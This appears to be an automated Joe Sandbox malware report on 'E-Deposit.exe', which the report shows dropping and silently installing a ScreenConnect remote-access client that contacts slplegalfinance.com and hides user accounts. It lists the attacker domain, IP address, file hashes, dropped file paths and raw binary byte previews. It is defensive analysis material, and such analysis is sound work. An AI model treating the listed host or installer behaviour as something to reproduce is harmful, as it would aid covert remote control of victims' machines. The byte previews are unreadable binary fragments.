                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584729 Sample: E-Deposit.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 66 53 slplegalfinance.com 2->53 57 Multi AV Scanner detection for submitted file 2->57 59 .NET source code contains potential unpacker 2->59 61 .NET source code references suspicious native API functions 2->61 63 4 other signatures 2->63 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 17 25 2->12         started        15 E-Deposit.exe 6 2->15         started        signatures3 process4 dnsIp5 33 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->33 dropped 35 C:\...\ScreenConnect.ClientService.exe, PE32 8->35 dropped 37 C:\Windows\Installer\MSID7B3.tmp, PE32 8->37 dropped 41 9 other files (none is malicious) 8->41 dropped 67 Enables network access during safeboot for specific services 8->67 69 Modifies security policies related information 8->69 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        55 slplegalfinance.com 185.143.228.176, 443, 49731, 49732 ASDETUKhttpwwwheficedcomGB Germany 12->55 71 Reads the Security eventlog 12->71 73 Reads the System eventlog 12->73 23 ScreenConnect.WindowsClient.exe 2 12->23         started        39 C:\Users\user\AppData\...-Deposit.exe.log, ASCII 15->39 dropped 75 Contains functionality to hide user accounts 15->75 26 msiexec.exe 6 15->26         started        file6 signatures7 process8 file9 29 rundll32.exe 11 17->29         started        65 Contains functionality to hide user accounts 23->65 43 C:\Users\user\AppData\Local\...\MSICCC5.tmp, PE32 26->43 dropped signatures10 process11 file12 45 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 29->45 dropped 47 C:\...\ScreenConnect.InstallerActions.dll, PE32 29->47 dropped 49 C:\Users\user\...\ScreenConnect.Core.dll, PE32 29->49 dropped 51 4 other files (none is malicious) 29->51 dropped 77 Contains functionality to hide user accounts 29->77 signatures13

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  E-Deposit.exe26%ReversingLabsWin32.Exploit.ScreenConnectTool
                                  E-Deposit.exe32%VirustotalBrowse

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSID590.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSID7B3.tmp0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  http://slplegalfinance.com:443/0%Avira URL Cloudsafe
                                  https://feedback.screenconnect.com/Feedback.axd0%Avira URL Cloudsafe
                                  http://slplegalfinance.com:443/d0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  slplegalfinance.com
                                  		185.143.228.176
                                  		truefalse
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                      		high
                                      http://slplegalfinance.com:443/dScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000024CD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000257D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.0000000002419000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000234E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000021CF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000022A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000261C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                        		high
                                        http://slplegalfinance.com:443/ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000216D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                            		high
                                            https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.2.drfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.143.228.176
                                              		slplegalfinance.comGermany
                                              		61317ASDETUKhttpwwwheficedcomGBfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1584729
                                              Start date and time:2025-01-06 11:45:19 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 21s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:E-Deposit.exe
                                              Detection:MAL
                                              Classification:mal66.evad.winEXE@15/65@1/1
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 75%
                                              • Number of executed functions: 227
                                              • Number of non-executed functions: 2
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target E-Deposit.exe, PID 7276 because it is empty
                                              • Execution Graph export aborted for target rundll32.exe, PID 7468 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ASDETUKhttpwwwheficedcomGBarmv5l.elfGet hashmaliciousUnknownBrowse
                                              • 134.203.202.155
                                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                              • 191.108.204.217
                                              Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 173.239.228.7
                                              https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADgGet hashmaliciousUnknownBrowse
                                              • 102.165.14.26
                                              armv5l.elfGet hashmaliciousUnknownBrowse
                                              • 154.127.57.214
                                              nsharm7.elfGet hashmaliciousMiraiBrowse
                                              • 102.165.19.216
                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                              • 64.40.25.144
                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 45.141.232.110
                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 85.208.114.155

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllSecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                            dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllSecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                            file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                              dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Config.Msi\59d35d.rbs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219732
                                                                                  Entropy (8bit):6.581710443928379
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:GW09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGh:50uH2aCGw1ST1wQLdqvh
                                                                                  MD5:CD1A26320D872AE141BB93D78D5F8EB7
                                                                                  SHA1:4A87E31C682485C9F2C4412CDA4911CA98063E12
                                                                                  SHA-256:8FD8AB05D1068D643B6106E40FAFA2555981D5C8447DC4F070407EB19101870B
                                                                                  SHA-512:D797748DF93F3D6D9BC7C0EA8902EBEE83EB4E2E4BAC791B52DBF4CDF192DBF076054BCA11797A2169A9F9FF0A67EEEE8DBE50FA527E425A433FD9B8836EC0E3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\59d35d.rbs, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.-&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{B8D1B927-3B49-E2F3-F63F

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.en-US.resources

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):347
                                                                                  Entropy (8bit):4.803780834806902
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10hQerKQe9Tn:rHy2DLI4MWoHO8L9cAgRMZRCl1aHmh
                                                                                  MD5:EC6BAD264881A1AE9D05F73712399809
                                                                                  SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                                                                  SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                                                                  SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.1..../Please do not turn off or unplug your computer...

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.resources

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):5733
                                                                                  Entropy (8bit):4.54751304306711
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:r6KTKyKUeTj26/BcBP61mJkB8KpwhpNeE:rYBcBy1N8J
                                                                                  MD5:6F99B6E5484B5785AB7BF8E46882205A
                                                                                  SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                                                                  SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                                                                  SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....1P)...H.p...5...............0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..... .....PNG........IHDR.............[i.@...KPLTE.x........l......{..v........r.R..m...p..........`..d._..@..s........dFU...0IDATx...n.0.....icS......i.nF.....s.(g..+..u..5V.....i..Mk.T.......y..r]c..p.|.Dy....5.:.[C.........................................................s.>..G..[[).....o.>.Z.-...>...X....W...?....yF.{m|I.8..r.k.NIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIY.l.o.}NctiZc.....r..X.V..7r.......h.,.....IEND.B`...#124586 .........C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C..

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.en-US.resources

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.resources

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.586775768189165
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                  MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                  SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                  SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                  SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.06942231395039
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                  MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                  SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                  SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                  SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
